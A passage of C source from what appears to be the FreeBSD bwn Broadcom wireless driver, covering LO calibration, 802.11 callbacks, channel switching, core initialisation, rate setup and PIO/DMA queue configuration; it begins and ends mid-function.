struct bwn_lo_calib *cal, *tmp; uint8_t expired = 0; bwn_mac_suspend(mac); if (lo == NULL) goto fail; BWN_GETTIME(now); if (bwn_has_hwpctl(mac)) { expire = now - BWN_LO_PWRVEC_EXPIRE; if (time_before(lo->pwr_vec_read_time, expire)) { bwn_lo_get_powervector(mac); bwn_phy_g_dc_lookup_init(mac, 0); } goto fail; } expire = now - BWN_LO_CALIB_EXPIRE; TAILQ_FOREACH_SAFE(cal, &lo->calib_list, list, tmp) { if (!time_before(cal->calib_time, expire)) continue; if (BWN_BBATTCMP(&cal->bbatt, &pg->pg_bbatt) && BWN_RFATTCMP(&cal->rfatt, &pg->pg_rfatt)) { KASSERT(!expired, ("%s:%d: fail", __func__, __LINE__)); expired = 1; } DPRINTF(sc, BWN_DEBUG_LO, "expired BB %u RF %u %u I %d Q %d\n", cal->bbatt.att, cal->rfatt.att, cal->rfatt.padmix, cal->ctl.i, cal->ctl.q); TAILQ_REMOVE(&lo->calib_list, cal, list); free(cal, M_DEVBUF); } if (expired || TAILQ_EMPTY(&lo->calib_list)) { cal = bwn_lo_calibset(mac, &pg->pg_bbatt, &pg->pg_rfatt); if (cal == NULL) { device_printf(sc->sc_dev, "failed to recalibrate LO\n"); goto fail; } TAILQ_INSERT_TAIL(&lo->calib_list, cal, list); bwn_lo_write(mac, &cal->ctl); } fail: bwn_mac_enable(mac); } static void bwn_phy_g_task_60s(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; uint8_t old = phy->chan; if (!(siba_sprom_get_bf_lo(sc->sc_dev) & 
BWN_BFL_RSSI)) return; bwn_mac_suspend(mac); bwn_nrssi_slope_11g(mac); if ((phy->rf_ver == 0x2050) && (phy->rf_rev == 8)) { bwn_switch_channel(mac, (old >= 8) ? 1 : 13); bwn_switch_channel(mac, old); } bwn_mac_enable(mac); } static void bwn_phy_switch_analog(struct bwn_mac *mac, int on) { BWN_WRITE_2(mac, BWN_PHY0, on ? 0 : 0xf4); } static int bwn_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || mac->mac_status < BWN_MAC_STATUS_STARTED) { ieee80211_free_node(ni); m_freem(m); return (ENETDOWN); } BWN_LOCK(sc); if (bwn_tx_isfull(sc, m)) { ieee80211_free_node(ni); m_freem(m); ifp->if_oerrors++; BWN_UNLOCK(sc); return (ENOBUFS); } if (bwn_tx_start(sc, ni, m) != 0) { if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; } sc->sc_watchdog_timer = 5; BWN_UNLOCK(sc); return (0); } /* * Callback from the 802.11 layer to update the slot time * based on the current setting. We use it to notify the * firmware of ERP changes and the f/w takes care of things * like slot time and preamble. */ static void bwn_updateslot(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct bwn_mac *mac; BWN_LOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { mac = (struct bwn_mac *)sc->sc_curmac; bwn_set_slot_time(mac, (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20); } BWN_UNLOCK(sc); } /* * Callback from the 802.11 layer after a promiscuous mode change. * Note this interface does not check the operating mode as this * is an internal callback and we are expected to honor the current * state (e.g. this is used for setting the interface in promiscuous * mode when operating in hostap mode to do ACS). */ static void bwn_update_promisc(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { if (ifp->if_flags & IFF_PROMISC) sc->sc_filters |= BWN_MACCTL_PROMISC; else sc->sc_filters &= ~BWN_MACCTL_PROMISC; bwn_set_opmode(mac); } BWN_UNLOCK(sc); } /* * Callback from the 802.11 layer to update WME parameters. 
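 * The per-AC parameters supplied by net80211 are copied into firmware
 * shared memory at the offsets listed in bwn_wme_shm_offsets[], with the
 * MAC suspended around the update.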
*/ static int bwn_wme_update(struct ieee80211com *ic) { struct bwn_softc *sc = ic->ic_ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; struct wmeParams *wmep; int i; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { bwn_mac_suspend(mac); for (i = 0; i < N(sc->sc_wmeParams); i++) { wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[i]; bwn_wme_loadparams(mac, wmep, bwn_wme_shm_offsets[i]); } bwn_mac_enable(mac); } BWN_UNLOCK(sc); return (0); } static void bwn_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { sc->sc_filters |= BWN_MACCTL_BEACON_PROMISC; bwn_set_opmode(mac); /* disable CFP update during scan */ bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_SKIP_CFP_UPDATE); } BWN_UNLOCK(sc); } static void bwn_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { sc->sc_filters &= ~BWN_MACCTL_BEACON_PROMISC; bwn_set_opmode(mac); bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_SKIP_CFP_UPDATE); } BWN_UNLOCK(sc); } static void bwn_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; struct bwn_phy *phy = &mac->mac_phy; int chan, error; BWN_LOCK(sc); error = bwn_switch_band(sc, ic->ic_curchan); if (error) goto fail; bwn_mac_suspend(mac); bwn_set_txretry(mac, BWN_RETRY_SHORT, BWN_RETRY_LONG); chan = ieee80211_chan2ieee(ic, ic->ic_curchan); if (chan != phy->chan) bwn_switch_channel(mac, chan); /* TX power level */ if (ic->ic_curchan->ic_maxpower != 0 && ic->ic_curchan->ic_maxpower != phy->txpower) { phy->txpower = ic->ic_curchan->ic_maxpower / 2; bwn_phy_txpower_check(mac, BWN_TXPWR_IGNORE_TIME | BWN_TXPWR_IGNORE_TSSI); } bwn_set_txantenna(mac, BWN_ANT_DEFAULT); if (phy->set_antenna) phy->set_antenna(mac, BWN_ANT_DEFAULT); if (sc->sc_rf_enabled != phy->rf_on) { if (sc->sc_rf_enabled) { bwn_rf_turnon(mac); if (!(mac->mac_flags & BWN_MAC_FLAG_RADIO_ON)) device_printf(sc->sc_dev, "please turn on the RF switch\n"); } else bwn_rf_turnoff(mac); } bwn_mac_enable(mac); fail: /* * Setup radio tap channel freq and flags */ sc->sc_tx_th.wt_chan_freq = sc->sc_rx_th.wr_chan_freq = htole16(ic->ic_curchan->ic_freq); sc->sc_tx_th.wt_chan_flags = sc->sc_rx_th.wr_chan_flags = htole16(ic->ic_curchan->ic_flags & 0xffff); BWN_UNLOCK(sc); } static struct ieee80211vap * bwn_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac0[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct ieee80211vap *vap; struct bwn_vap *bvp; uint8_t mac[IEEE80211_ADDR_LEN]; IEEE80211_ADDR_COPY(mac, mac0); switch (opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: case IEEE80211_M_STA: case IEEE80211_M_WDS: case IEEE80211_M_MONITOR: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: break; default: return (NULL); } IEEE80211_ADDR_COPY(sc->sc_macaddr, mac0); bvp = (struct bwn_vap *) malloc(sizeof(struct bwn_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (bvp == NULL) { device_printf(sc->sc_dev, "failed to allocate a buffer\n"); return (NULL); } vap = &bvp->bv_vap; ieee80211_vap_setup(ic, vap, name, unit, 
opmode, flags, bssid, mac); IEEE80211_ADDR_COPY(vap->iv_myaddr, mac); /* override with driver methods */ bvp->bv_newstate = vap->iv_newstate; vap->iv_newstate = bwn_newstate; /* override max aid so sta's cannot assoc when we're out of sta id's */ vap->iv_max_aid = BWN_STAID_MAX; ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); return (vap); } static void bwn_vap_delete(struct ieee80211vap *vap) { struct bwn_vap *bvp = BWN_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(bvp, M_80211_VAP); } static void bwn_init(void *arg) { struct bwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int error = 0; DPRINTF(sc, BWN_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); BWN_LOCK(sc); error = bwn_init_locked(sc); BWN_UNLOCK(sc); if (error == 0) ieee80211_start_all(ic); /* start all vap's */ } static int bwn_init_locked(struct bwn_softc *sc) { struct bwn_mac *mac; struct ifnet *ifp = sc->sc_ifp; int error; BWN_ASSERT_LOCKED(sc); bzero(sc->sc_bssid, IEEE80211_ADDR_LEN); sc->sc_flags |= BWN_FLAG_NEED_BEACON_TP; sc->sc_filters = 0; bwn_wme_clear(sc); sc->sc_beacons[0] = sc->sc_beacons[1] = 0; sc->sc_rf_enabled = 1; mac = sc->sc_curmac; if (mac->mac_status == BWN_MAC_STATUS_UNINIT) { error = bwn_core_init(mac); if (error != 0) return (error); } if (mac->mac_status == BWN_MAC_STATUS_INITED) bwn_core_start(mac); bwn_set_opmode(mac); bwn_set_pretbtt(mac); bwn_spu_setdelay(mac, 0); bwn_set_macaddr(mac); ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_rfswitch_ch, hz, bwn_rfswitch, sc); callout_reset(&sc->sc_watchdog_ch, hz, bwn_watchdog, sc); return (0); } static void bwn_stop(struct bwn_softc *sc, int statechg) { BWN_LOCK(sc); bwn_stop_locked(sc, statechg); BWN_UNLOCK(sc); } static void bwn_stop_locked(struct bwn_softc *sc, int statechg) { struct bwn_mac *mac = sc->sc_curmac; struct ifnet *ifp = sc->sc_ifp; BWN_ASSERT_LOCKED(sc); if (mac->mac_status >= BWN_MAC_STATUS_INITED) { /* XXX FIXME opmode not based on VAP */ bwn_set_opmode(mac); bwn_set_macaddr(mac); } if (mac->mac_status >= BWN_MAC_STATUS_STARTED) bwn_core_stop(mac); callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; bwn_core_exit(mac); sc->sc_rf_enabled = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); } static void bwn_wme_clear(struct bwn_softc *sc) { #define MS(_v, _f) (((_v) & _f) >> _f##_S) struct wmeParams *p; unsigned int i; KASSERT(N(bwn_wme_shm_offsets) == N(sc->sc_wmeParams), ("%s:%d: fail", __func__, __LINE__)); for (i = 0; i < N(sc->sc_wmeParams); i++) { p = &(sc->sc_wmeParams[i]); switch (bwn_wme_shm_offsets[i]) { case BWN_WME_VOICE: p->wmep_txopLimit = 0; p->wmep_aifsn = 2; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x0001, WME_PARAM_LOGCWMAX); break; case BWN_WME_VIDEO: p->wmep_txopLimit = 0; p->wmep_aifsn = 2; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x0001, WME_PARAM_LOGCWMAX); break; case BWN_WME_BESTEFFORT: p->wmep_txopLimit = 0; p->wmep_aifsn = 3; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x03ff, WME_PARAM_LOGCWMAX); break; case BWN_WME_BACKGROUND: p->wmep_txopLimit = 0; p->wmep_aifsn = 7; /* XXX FIXME: log2(cwmin) */ p->wmep_logcwmin = MS(0x0001, WME_PARAM_LOGCWMIN); p->wmep_logcwmax = MS(0x03ff, WME_PARAM_LOGCWMAX); break; default: KASSERT(0 == 1, ("%s:%d: fail", 
__func__, __LINE__)); } } } static int bwn_core_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint64_t hf; int error; KASSERT(mac->mac_status == BWN_MAC_STATUS_UNINIT, ("%s:%d: fail", __func__, __LINE__)); siba_powerup(sc->sc_dev, 0); if (!siba_dev_isup(sc->sc_dev)) bwn_reset_core(mac, mac->mac_phy.gmode ? BWN_TGSLOW_SUPPORT_G : 0); mac->mac_flags &= ~BWN_MAC_FLAG_DFQVALID; mac->mac_flags |= BWN_MAC_FLAG_RADIO_ON; mac->mac_phy.hwpctl = (bwn_hwpctl) ? 1 : 0; BWN_GETTIME(mac->mac_phy.nexttime); mac->mac_phy.txerrors = BWN_TXERROR_MAX; bzero(&mac->mac_stats, sizeof(mac->mac_stats)); mac->mac_stats.link_noise = -95; mac->mac_reason_intr = 0; bzero(mac->mac_reason, sizeof(mac->mac_reason)); mac->mac_intr_mask = BWN_INTR_MASKTEMPLATE; #ifdef BWN_DEBUG if (sc->sc_debug & BWN_DEBUG_XMIT) mac->mac_intr_mask &= ~BWN_INTR_PHY_TXERR; #endif mac->mac_suspended = 1; mac->mac_task_state = 0; memset(&mac->mac_noise, 0, sizeof(mac->mac_noise)); mac->mac_phy.init_pre(mac); siba_pcicore_intr(sc->sc_dev); siba_fix_imcfglobug(sc->sc_dev); bwn_bt_disable(mac); if (mac->mac_phy.prepare_hw) { error = mac->mac_phy.prepare_hw(mac); if (error) goto fail0; } error = bwn_chip_init(mac); if (error) goto fail0; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_COREREV, siba_get_revid(sc->sc_dev)); hf = bwn_hf_read(mac); if (mac->mac_phy.type == BWN_PHYTYPE_G) { hf |= BWN_HF_GPHY_SYM_WORKAROUND; if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) hf |= BWN_HF_PAGAINBOOST_OFDM_ON; if (mac->mac_phy.rev == 1) hf |= BWN_HF_GPHY_DC_CANCELFILTER; } if (mac->mac_phy.rf_ver == 0x2050) { if (mac->mac_phy.rf_rev < 6) hf |= BWN_HF_FORCE_VCO_RECALC; if (mac->mac_phy.rf_rev == 6) hf |= BWN_HF_4318_TSSI; } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_CRYSTAL_NOSLOW) hf |= BWN_HF_SLOWCLOCK_REQ_OFF; if ((siba_get_type(sc->sc_dev) == SIBA_TYPE_PCI) && (siba_get_pcicore_revid(sc->sc_dev) <= 10)) hf |= BWN_HF_PCI_SLOWCLOCK_WORKAROUND; hf &= ~BWN_HF_SKIP_CFP_UPDATE; bwn_hf_write(mac, hf); bwn_set_txretry(mac, BWN_RETRY_SHORT, BWN_RETRY_LONG); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_SHORT_RETRY_FALLBACK, 3); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_LONG_RETRY_FALLBACK, 2); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_MAXTIME, 1); bwn_rate_init(mac); bwn_set_phytxctl(mac); bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_CONT_MIN, (mac->mac_phy.type == BWN_PHYTYPE_B) ? 
0x1f : 0xf); bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_CONT_MAX, 0x3ff); if (siba_get_type(sc->sc_dev) == SIBA_TYPE_PCMCIA || bwn_usedma == 0) bwn_pio_init(mac); else bwn_dma_init(mac); bwn_wme_init(mac); bwn_spu_setdelay(mac, 1); bwn_bt_enable(mac); siba_powerup(sc->sc_dev, !(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_CRYSTAL_NOSLOW)); bwn_set_macaddr(mac); bwn_crypt_init(mac); /* XXX LED initialization */ mac->mac_status = BWN_MAC_STATUS_INITED; return (error); fail0: siba_powerdown(sc->sc_dev); KASSERT(mac->mac_status == BWN_MAC_STATUS_UNINIT, ("%s:%d: fail", __func__, __LINE__)); return (error); } static void bwn_core_start(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t tmp; KASSERT(mac->mac_status == BWN_MAC_STATUS_INITED, ("%s:%d: fail", __func__, __LINE__)); if (siba_get_revid(sc->sc_dev) < 5) return; while (1) { tmp = BWN_READ_4(mac, BWN_XMITSTAT_0); if (!(tmp & 0x00000001)) break; tmp = BWN_READ_4(mac, BWN_XMITSTAT_1); } bwn_mac_enable(mac); BWN_WRITE_4(mac, BWN_INTR_MASK, mac->mac_intr_mask); callout_reset(&sc->sc_task_ch, hz * 15, bwn_tasks, mac); mac->mac_status = BWN_MAC_STATUS_STARTED; } static void bwn_core_exit(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t macctl; BWN_ASSERT_LOCKED(mac->mac_sc); KASSERT(mac->mac_status <= BWN_MAC_STATUS_INITED, ("%s:%d: fail", __func__, __LINE__)); if (mac->mac_status != BWN_MAC_STATUS_INITED) return; mac->mac_status = BWN_MAC_STATUS_UNINIT; macctl = BWN_READ_4(mac, BWN_MACCTL); macctl &= ~BWN_MACCTL_MCODE_RUN; macctl |= BWN_MACCTL_MCODE_JMP0; BWN_WRITE_4(mac, BWN_MACCTL, macctl); bwn_dma_stop(mac); bwn_pio_stop(mac); bwn_chip_exit(mac); mac->mac_phy.switch_analog(mac, 0); siba_dev_down(sc->sc_dev, 0); siba_powerdown(sc->sc_dev); } static void bwn_bt_disable(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; (void)sc; /* XXX do nothing yet */ } static int bwn_chip_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy *phy = &mac->mac_phy; uint32_t macctl; int error; macctl = BWN_MACCTL_IHR_ON | BWN_MACCTL_SHM_ON | BWN_MACCTL_STA; if (phy->gmode) macctl |= BWN_MACCTL_GMODE; BWN_WRITE_4(mac, BWN_MACCTL, macctl); error = bwn_fw_fillinfo(mac); if (error) return (error); error = bwn_fw_loaducode(mac); if (error) return (error); error = bwn_gpio_init(mac); if (error) return (error); error = bwn_fw_loadinitvals(mac); if (error) { siba_gpio_set(sc->sc_dev, 0); return (error); } phy->switch_analog(mac, 1); error = bwn_phy_init(mac); if (error) { siba_gpio_set(sc->sc_dev, 0); return (error); } if (phy->set_im) phy->set_im(mac, BWN_IMMODE_NONE); if (phy->set_antenna) phy->set_antenna(mac, BWN_ANT_DEFAULT); bwn_set_txantenna(mac, BWN_ANT_DEFAULT); if (phy->type == BWN_PHYTYPE_B) BWN_WRITE_2(mac, 0x005e, BWN_READ_2(mac, 0x005e) | 0x0004); BWN_WRITE_4(mac, 0x0100, 0x01000000); if (siba_get_revid(sc->sc_dev) < 5) BWN_WRITE_4(mac, 0x010c, 0x01000000); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_STA); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_STA); bwn_shm_write_2(mac, BWN_SHARED, 0x0074, 0x0000); bwn_set_opmode(mac); if (siba_get_revid(sc->sc_dev) < 3) { BWN_WRITE_2(mac, 0x060e, 0x0000); BWN_WRITE_2(mac, 0x0610, 0x8000); BWN_WRITE_2(mac, 0x0604, 0x0000); BWN_WRITE_2(mac, 0x0606, 0x0200); } else { BWN_WRITE_4(mac, 0x0188, 0x80000000); BWN_WRITE_4(mac, 0x018c, 0x02000000); } BWN_WRITE_4(mac, BWN_INTR_REASON, 0x00004000); BWN_WRITE_4(mac, BWN_DMA0_INTR_MASK, 0x0001dc00); BWN_WRITE_4(mac, BWN_DMA1_INTR_MASK, 0x0000dc00);
BWN_WRITE_4(mac, BWN_DMA2_INTR_MASK, 0x0000dc00); BWN_WRITE_4(mac, BWN_DMA3_INTR_MASK, 0x0001dc00); BWN_WRITE_4(mac, BWN_DMA4_INTR_MASK, 0x0000dc00); BWN_WRITE_4(mac, BWN_DMA5_INTR_MASK, 0x0000dc00); siba_write_4(sc->sc_dev, SIBA_TGSLOW, siba_read_4(sc->sc_dev, SIBA_TGSLOW) | 0x00100000); BWN_WRITE_2(mac, BWN_POWERUP_DELAY, siba_get_cc_powerdelay(sc->sc_dev)); return (error); } /* read hostflags */ static uint64_t bwn_hf_read(struct bwn_mac *mac) { uint64_t ret; ret = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFHI); ret <<= 16; ret |= bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFMI); ret <<= 16; ret |= bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFLO); return (ret); } static void bwn_hf_write(struct bwn_mac *mac, uint64_t value) { bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_HFLO, (value & 0x00000000ffffull)); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_HFMI, (value & 0x0000ffff0000ull) >> 16); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_HFHI, (value & 0xffff00000000ULL) >> 32); } static void bwn_set_txretry(struct bwn_mac *mac, int s, int l) { bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_SHORT_RETRY, MIN(s, 0xf)); bwn_shm_write_2(mac, BWN_SCRATCH, BWN_SCRATCH_LONG_RETRY, MIN(l, 0xf)); } static void bwn_rate_init(struct bwn_mac *mac) { switch (mac->mac_phy.type) { case BWN_PHYTYPE_A: case BWN_PHYTYPE_G: case BWN_PHYTYPE_LP: case BWN_PHYTYPE_N: bwn_rate_write(mac, BWN_OFDM_RATE_6MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_12MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_18MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_24MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_36MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_48MB, 1); bwn_rate_write(mac, BWN_OFDM_RATE_54MB, 1); if (mac->mac_phy.type == BWN_PHYTYPE_A) break; /* FALLTHROUGH */ case BWN_PHYTYPE_B: bwn_rate_write(mac, BWN_CCK_RATE_1MB, 0); bwn_rate_write(mac, BWN_CCK_RATE_2MB, 0); bwn_rate_write(mac, BWN_CCK_RATE_5MB, 0); bwn_rate_write(mac, BWN_CCK_RATE_11MB, 0); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } static void bwn_rate_write(struct bwn_mac *mac, uint16_t rate, int ofdm) { uint16_t offset; if (ofdm) { offset = 0x480; offset += (bwn_plcp_getofdm(rate) & 0x000f) * 2; } else { offset = 0x4c0; offset += (bwn_plcp_getcck(rate) & 0x000f) * 2; } bwn_shm_write_2(mac, BWN_SHARED, offset + 0x20, bwn_shm_read_2(mac, BWN_SHARED, offset)); } static uint8_t bwn_plcp_getcck(const uint8_t bitrate) { switch (bitrate) { case BWN_CCK_RATE_1MB: return (0x0a); case BWN_CCK_RATE_2MB: return (0x14); case BWN_CCK_RATE_5MB: return (0x37); case BWN_CCK_RATE_11MB: return (0x6e); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static uint8_t bwn_plcp_getofdm(const uint8_t bitrate) { switch (bitrate) { case BWN_OFDM_RATE_6MB: return (0xb); case BWN_OFDM_RATE_9MB: return (0xf); case BWN_OFDM_RATE_12MB: return (0xa); case BWN_OFDM_RATE_18MB: return (0xe); case BWN_OFDM_RATE_24MB: return (0x9); case BWN_OFDM_RATE_36MB: return (0xd); case BWN_OFDM_RATE_48MB: return (0x8); case BWN_OFDM_RATE_54MB: return (0xc); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static void bwn_set_phytxctl(struct bwn_mac *mac) { uint16_t ctl; ctl = (BWN_TX_PHY_ENC_CCK | BWN_TX_PHY_ANT01AUTO | BWN_TX_PHY_TXPWR); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_BEACON_PHYCTL, ctl); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_ACKCTS_PHYCTL, ctl); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_PHYCTL, ctl); } static void bwn_pio_init(struct bwn_mac *mac) { struct bwn_pio *pio = &mac->mac_method.pio; BWN_WRITE_4(mac, BWN_MACCTL, 
BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_BIGENDIAN); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_RX_PADOFFSET, 0); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_BK], 0); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_BE], 1); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_VI], 2); bwn_pio_set_txqueue(mac, &pio->wme[WME_AC_VO], 3); bwn_pio_set_txqueue(mac, &pio->mcast, 4); bwn_pio_setupqueue_rx(mac, &pio->rx, 0); } static void bwn_pio_set_txqueue(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, int index) { struct bwn_pio_txpkt *tp; struct bwn_softc *sc = mac->mac_sc; unsigned int i; tq->tq_base = bwn_pio_idx2base(mac, index) + BWN_PIO_TXQOFFSET(mac); tq->tq_index = index; tq->tq_free = BWN_PIO_MAX_TXPACKETS; if (siba_get_revid(sc->sc_dev) >= 8) tq->tq_size = 1920; else { tq->tq_size = bwn_pio_read_2(mac, tq, BWN_PIO_TXQBUFSIZE); tq->tq_size -= 80; } TAILQ_INIT(&tq->tq_pktlist); for (i = 0; i < N(tq->tq_pkts); i++) { tp = &(tq->tq_pkts[i]); tp->tp_index = i; tp->tp_queue = tq; TAILQ_INSERT_TAIL(&tq->tq_pktlist, tp, tp_list); } } static uint16_t bwn_pio_idx2base(struct bwn_mac *mac, int index) { struct bwn_softc *sc = mac->mac_sc; static const uint16_t bases[] = { BWN_PIO_BASE0, BWN_PIO_BASE1, BWN_PIO_BASE2, BWN_PIO_BASE3, BWN_PIO_BASE4, BWN_PIO_BASE5, BWN_PIO_BASE6, BWN_PIO_BASE7, }; static const uint16_t bases_rev11[] = { BWN_PIO11_BASE0, BWN_PIO11_BASE1, BWN_PIO11_BASE2, BWN_PIO11_BASE3, BWN_PIO11_BASE4, BWN_PIO11_BASE5, }; if (siba_get_revid(sc->sc_dev) >= 11) { if (index >= N(bases_rev11)) device_printf(sc->sc_dev, "%s: warning\n", __func__); return (bases_rev11[index]); } if (index >= N(bases)) device_printf(sc->sc_dev, "%s: warning\n", __func__); return (bases[index]); } static void bwn_pio_setupqueue_rx(struct bwn_mac *mac, struct bwn_pio_rxqueue *prq, int index) { struct bwn_softc *sc = mac->mac_sc; prq->prq_mac = mac; prq->prq_rev = siba_get_revid(sc->sc_dev); prq->prq_base = bwn_pio_idx2base(mac, index) + BWN_PIO_RXQOFFSET(mac); bwn_dma_rxdirectfifo(mac, index, 1); } static void bwn_destroy_pioqueue_tx(struct bwn_pio_txqueue *tq) { if (tq == NULL) return; bwn_pio_cancel_tx_packets(tq); } static void bwn_destroy_queue_tx(struct bwn_pio_txqueue *pio) { bwn_destroy_pioqueue_tx(pio); } static uint16_t bwn_pio_read_2(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t offset) { return (BWN_READ_2(mac, tq->tq_base + offset)); } static void bwn_dma_rxdirectfifo(struct bwn_mac *mac, int idx, uint8_t enable) { uint32_t ctl; int type; uint16_t base; type = bwn_dma_mask2type(bwn_dma_mask(mac)); base = bwn_dma_base(type, idx); if (type == BWN_DMA_64BIT) { ctl = BWN_READ_4(mac, base + BWN_DMA64_RXCTL); ctl &= ~BWN_DMA64_RXDIRECTFIFO; if (enable) ctl |= BWN_DMA64_RXDIRECTFIFO; BWN_WRITE_4(mac, base + BWN_DMA64_RXCTL, ctl); } else { ctl = BWN_READ_4(mac, base + BWN_DMA32_RXCTL); ctl &= ~BWN_DMA32_RXDIRECTFIFO; if (enable) ctl |= BWN_DMA32_RXDIRECTFIFO; BWN_WRITE_4(mac, base + BWN_DMA32_RXCTL, ctl); } } static uint64_t bwn_dma_mask(struct bwn_mac *mac) { uint32_t tmp; uint16_t base; tmp = BWN_READ_4(mac, SIBA_TGSHIGH); if (tmp & SIBA_TGSHIGH_DMA64) return (BWN_DMA_BIT_MASK(64)); base = bwn_dma_base(0, 0); BWN_WRITE_4(mac, base + BWN_DMA32_TXCTL, BWN_DMA32_TXADDREXT_MASK); tmp = BWN_READ_4(mac, base + BWN_DMA32_TXCTL); if (tmp & BWN_DMA32_TXADDREXT_MASK) return (BWN_DMA_BIT_MASK(32)); return (BWN_DMA_BIT_MASK(30)); } static int bwn_dma_mask2type(uint64_t dmamask) { if (dmamask == BWN_DMA_BIT_MASK(30)) return (BWN_DMA_30BIT); if (dmamask == BWN_DMA_BIT_MASK(32)) return (BWN_DMA_32BIT); if (dmamask == 
